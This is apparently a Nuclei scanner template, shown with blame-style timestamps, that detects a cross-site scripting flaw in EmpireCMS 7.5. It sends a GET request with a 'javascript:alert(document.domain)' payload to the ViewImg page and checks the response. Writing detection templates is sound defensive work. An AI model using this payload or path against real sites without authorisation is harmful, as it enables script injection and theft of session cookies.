2021-04-05 08:16:27 +00:00
id : empirecms-xss
info :
2022-09-21 21:42:27 +00:00
name : EmpireCMS 7.5 - Cross-Site Scripting
2021-04-05 08:16:27 +00:00
author : pikpikcu
2022-09-21 21:42:27 +00:00
severity : high
description : EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://www.geek-share.com/detail/2777280260.html
2022-09-21 21:42:27 +00:00
- https://github.com/leadscloud/EmpireCMS/issues/4
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-04-05 08:16:27 +00:00
tags : empirecms,xss
requests :
- method : GET
path :
2021-04-05 16:43:16 +00:00
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)"
2021-04-05 08:16:27 +00:00
matchers-condition : and
matchers :
- type : word
words :
- 'onmousewheel=\"return bbimg(this)\"'
- type : status
status :
- 200
2022-09-21 21:42:27 +00:00
# Enhanced by md on 2022/09/20